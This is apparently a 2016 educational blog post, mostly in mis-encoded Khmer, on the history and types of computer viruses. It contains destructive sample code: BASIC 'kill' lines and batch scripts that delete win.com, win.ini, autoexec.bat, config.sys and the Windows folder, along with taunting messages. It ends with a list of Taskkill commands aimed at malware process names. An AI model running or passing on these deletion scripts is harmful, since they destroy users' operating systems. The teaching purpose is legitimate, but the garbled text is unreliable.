ប្រវត្តិ វីរុស​ កុំព្យូទ័រ - Management Information Systems

Breaking

15 September 2016

ប្រវត្តិ វីរុស​ កុំព្យូទ័រ

etI Virus qøgtamrebobNa?
  • Internet
  • E-mail
  • Internet browsing
  • File Transfer (FTP)
  • Newsgroups (News)
  • Network
  • Share Disk
  • Flask
  • CD

-VIRUS GacqøgedayxøÜnÉgtam Diskette rW Flash EdlmanCab;CamYy File epSgeTot Virus
Computer KWCakmµviFIGaccUlRKb;TIkEnøgenAkñúg Computer rWkñúg FileepSg²Biesskñúg Hard Disk.-sBVéf¶man 747 Virus Edlcab;sMlab;)annig Virus CaeRcInRbePTeTotcab;min)an
-Virus EdlmandMbUgenAkñúg Packet PC OS maneQµaHfa ”29 A virus” va)anqøgkat;ExS “Coble ”
Edl Copy ÉksarBI Computer.
-Virus eQµaH Cabir Worm vavaylukcUlkñúg Mobile edayqøgkat;tamBluetoothtamRbB½n§Network
mobile phone. Virus enHmanlkçNHBiessEdlsresrkñúgkmµviFI “Visual Studio.NET”
-Virus win 64 bit qøgkat;tamExSkñúg System Windows EdlmaneQµaHfa”Rugrat”EdleFVIeGayxUc
System IA64 rbs; Windows 64 bit vabMpøaj System Structure vaeRbIGnuKmn_ AIP rbs;
Win64 cMeBaH Virus Worm )anqøgtamryH InternetEdlCaRbePTemeraKbegáIteLIgeday
yuvsisS 18 qñaMeronenARbeTs Germany EdlmaneQµaHfa Sasser internet worm.


 NRbvtßiVIRUSN
13. Core War         (qñaM1983)
14. B rain              (1986)
15. Lehigh             (1987)ekItmanenAkñúgkmµviFIMicrosoft office
16. Robert             (1988)qøgtam Network
17. AIDS Trojan   (1989) qøgtam Network
18. Tequila            (1991)
19. Michelangelo   (1992)  “Bi)aksMlab;bMput
20. Concept           (1995) CaRbePT Virus Macro
21. Boza                (1996) ekItkñúg Windows 95
22. Melissa,Bubble boy     (1999) qøgtamInternet
23.kñúgqñaM2000[DDos,love Letter]xøaMgkøabMput
24.qñaM2001[Winux Windows/Linux Virus,Nimda,Code Red]qøgBIRbB½n§Linux cUl
kñúgRbB½n§WindowsrWtamInternet
25.qñaM2002ðVirus qøgtamFile.SWF
                  ðViruseQµaHSQLS piderbMpøajkmµviFISQL
                  ðViruseQµaHPerrunqøgtamFilerUbPaB
26. qñaM2003ðVirus eQµaHBlaster(MSBlast),Welchia(Nachi),Mimail,Lovgate..vaeFVI[KaMgdMenIrkar
       DCOM-RPCelI Window2k,XP nigvaGacbBa¢a[ Computer [biTShutdown )anCaerogral;
       eBlEdleRcInEtqøgtamRbB½n§ Network EdlmanP¢ab;CamYy Internet
7qñaM2004 ViruseQµaHSkype nig BeagleqøgtamkmµviFI Skype eRbIsMrab;niyayqøgeqøIyVoice.
7qñaM2005 manelcecjRbePTVirusEdlqøgtamChartRbePTVirusenHqøgtamkmµviFIdUcCa
     Yahoo!kmµviFIMSNqøgenAeBlEdlelakGñkChat.@Note
FcMeBaH Virus EdldMenIrkarkñúgDOSminpþl;plvi)akdl;eyIgb:unµaneT.
MviPaKeTAelI File EdlemeraK)anlub
kill “C:/windows/win.com”va)anbMpøajecal file win.com
kill “C:/windows/win.ini”   va)anbMpøajecal file win.ini
kill “C:/autoexec.bat”  va)anbMpøajecal           file autoexec.bat
kill “C:/config.sys”  va)anbMpøajecal file config.sys
print ”I hate people like you…” mann½yfavaeFVIkarbBaÄb;\p¥akmYyryHedIm,Ibgðaj
Message ”I hate people like you…” enAelIScreen monitor.
Sleep2 p¥akMessage ”I hate people like you…” cMnYn2 seconds
print”-Cyrus”bgðaj Message”I hate people like you…”enAelIScreen.
End    bBaÄb;nUvkarsresr
¯etIehtuGVI)anCa Virus lb;ecal File xageRkam?
etIvamansarHsMxan;y:agNa?
C:/windows/win.com
C:/windows/win.ini
C:/autoexec.bat
C:/config.sys
¯ C:/windows/win.com
vamansarHsMxan;sMrab;Restarting the computereLIgvijedIm,I[Computer booted
eLIgvijfile win.comvasMxan;sMrab;rt;cUlkñúgDOS.
¯ C:/windows/win.ini
vamansarHsMxan;sMrab;rt;elI Setting for windowsRbsinebIlubecal file win.ini
eBlenaHminGaccUlkñúg windows )aneLIy.
¯ C:/autoexec.bat
                   vamansarHsMxan;sMrab;rt; Start up Pøam²
¯ C:/config.sys
vamansarHsMxan;sMrab; Startup windowsEdr
¯NTLDR KWCa file sMrab;eBlEdl Start ComputerdMbUg

¯BOOT.INI
vasMxan;enAeBlEdleyIgmanWindows2EteyIg)anlubWindowsmYyecalEtenA
eBleyIgebIkComputerdMbUgvaenAEtecjMessage[eyIgSelect WindowsdEdl
dUecñHeyIgRtUveTAlubenAkñúgFile Boot.iniecalTukEtWindows mYyKt;.

Note :

¯@echo off
)anR)ab;ComputerrkSaTuk cd\ehIy)anR)ab; ComputereTAdl; cd:\windowsR)ab;
ComputerBIC:\eTAC:\windows@del win.comR)ab; Computer[lubecalWin.comBI
folderkñúgC:\window@del win.ini CamYyfile win.ini echo Fag
EX1:
@echo off
cd\
cd windows
@del win.com
@del win.ini
echo Fag,try to fix your computer now,End
EX2: RDsMrab;lub Folder
@echo off
cd\
rd windows’
echo you stupid bastard
echo hahahahahahahaha
echo Iown your ass
echo eeewww
echo goodbye
end….


RbePT Virus EdlCYbsBVéf¶
1.-Boot Viruses:eFVIeGayxUc Boot sector rbs; Floppy rW HDD.
    I.Boot sector vamansarHsMxan;bMputrbs; HDDEdlpÞúk Information vamanlT§PaBcab;epþIm
  Boot Computer BI Disk.
2.Macro Virus:(Relax. Melissa A, Bablas, 097M/Y2k)
vamanenAkñúg File kmµviFI
-Word (DOC) -Excel (XlS) -Power Point (ppt) -Access database (MDB) -Corel Draw….
vaeFVIeGaykmµviFIdMenIrkarKaMg²
3. Directory Virus:KWcUlkñúg System enAeBlEdleyIgkMBugebIk Filekñúg Directory BI Drive.
4.Encrypted (kmµviFIkMcat;emeraKKµanlT§PaB)
5.Polymorphic Virus: CaRbePT VirusEdlmankMritx<s;EdleRbIR)as;rab;rybec¢keTsvaeFVI
  eGayxUc File, program, macro disk EdlmaneQµaHfa Ywinz.
7.File Infector:CaRbePT Virus EdleFVIeGayxUc File program ­dUcCa File EXE nig COM.
8.Companion Virus:CaRbePT Virus EdleFVIeGayxUc FilevaeFVIskmµPaBpÞal;.Virus enHeFVI[
    MemoryePøckarcgcaMenAeBlEdldMenIrkarkmµviFI skmµPaBvaKWekIteLIgPøam²Edlman
   eQµaH Stator, Asimov,1539,Terrax,1069.
9.FAT Virus:(FAT File Allocation,Table)KWCaEpñkeRbIR)as;kñúg DisksMrab;cgsMB½n§PaBEpñkmYy
  én Computer.vaeFVIeGayxUclT§plkñúgBt’man)at;bg; File epSg²kñúg Directories.
10.Worms:vaeFVITMtak;TMngCamYySystemehIyrMxantamryH Email, Network, rWtam Chat (IRC­ rW  
    ICQ ) EdlmaneQµaHfa(PSWBugbear.B, Lovgate.F, Trile.C,Sobig.D,Mapsn).
11.Trojans rW Trojan Horse:Ca Virus dUcWormsEdrEtvaeFVIkarlubecalFilerWbMpøajBt’manenA
   kñúg HDDrWvalak;System rbs;eyIgdUcCaIRC.Sx2,Trifor.
12.Logic Bombus:KWvabMpøajDataenAkñúgComputerrbs;eyIg.


Virus's Name
 

C:\Documents and Settings\DOLA\Desktop\New Folder>CD\
C:\>Taskkill /F /IM Mixa_I.exe /t
C:\>Taskkill /F /IM Mixa.exe /t
C:\>Taskkill /F /IM global.exe /t
C:\>Taskkill /F /IM clbcatq.exe /t
C:\>Taskkill /F /IM compact.exe /t
C:\>Taskkill /F /IM edb00017.exe /t
C:\>Taskkill /F /IM cmpbk32.exe /t
C:\>Taskkill /F /IM comuid.exe /t
C:\>Taskkill /F /IM syste.exe /t
C:\>Taskkill /F /IM cdaudio.exe /t
C:\>Taskkill /F /IM default.exe /t
C:\>Taskkill /F /IM system.exe /t
C:\>Taskkill /F /IM security.exe /t
C:\>Taskkill /F /IM securit.exe /t
C:\>Taskkill /F /IM comadmin.exe /t
C:\>Taskkill /F /IM res2.exe
C:\>Taskkill /F /IM cmdl32.exe /t
C:\>Taskkill /F /IM comres.exe /t
C:\>Taskkill /F /IM comrereg.exe /t
C:\>Taskkill /F /IM edb.exe /t
C:\>Taskkill /F /IM sa.exe /t
C:\>Taskkill /F /IM WIN06V3.exe /t
C:\>Taskkill /F /IM DOLA.exe /t
C:\>Taskkill /F /IM cvc.exe /t
C:\>Taskkill /F /IM avpo.exe /t
C:\>Taskkill /F /IM taskmgr.exe /t
C:\>Taskkill /F /IM cmdow.exe /t
C:\>Taskkill /F /IM HelpSvc.exe /t
C:\>Taskkill /F /IM Wmiadap.exe /t
C:\>Taskkill /F /IM userxp.exe /t
C:\>Taskkill /F /IM BootLoader.vbs
C:\>Taskkill /F /IM Play" "Boys.exe /t
C:\>Taskkill /F /IM sp00lsv.exe /t
C:\>Taskkill /F /IM pfw.exe /t
C:\>Taskkill /F /IM ccprxy.exe /t
C:\>Taskkill /F /IM ld.exe /t
C:\>Taskkill /F /IM ghost.exe /t
C:\>Taskkill /F /IM winexplorer.exe /t
C:\>Taskkill /F /IM winmgmt.exe /t
C:\>Taskkill /F /IM sysfile.exe /t
C:\>Taskkill /F /IM CrackPassword.exe /t
C:\>Taskkill /F /IM MSOffice.exe /t
C:\>Taskkill /F /IM RVHOST.exe /t
C:\>Taskkill /F /IM wuauclt.exe /t
C:\>Taskkill /F /IM isass.exe /t
C:\>Taskkill /F /IM handydriver.exe /t
C:\>Taskkill /F /IM lgfxtray.exe /t
C:\>Taskkill /F /IM lnks.exe /t
C:\>Taskkill /F /IM Flashy.exe /t
C:\>Taskkill /F /IM oop.exe /t
C:\>Taskkill /F /IM startup.exe /t
C:\>Taskkill /F /IM sylepromotion.exe /t
C:\>Taskkill /F /IM wscript.exe /t
C:\>Taskkill /F /IM boot.exe /t
C:\>Taskkill /F /IM fun.exe /t
C:\>Taskkill /F /IM dc.exe /t

C:\>Taskkill /F /IM dc2k5.exe /t

No comments:

Post a Comment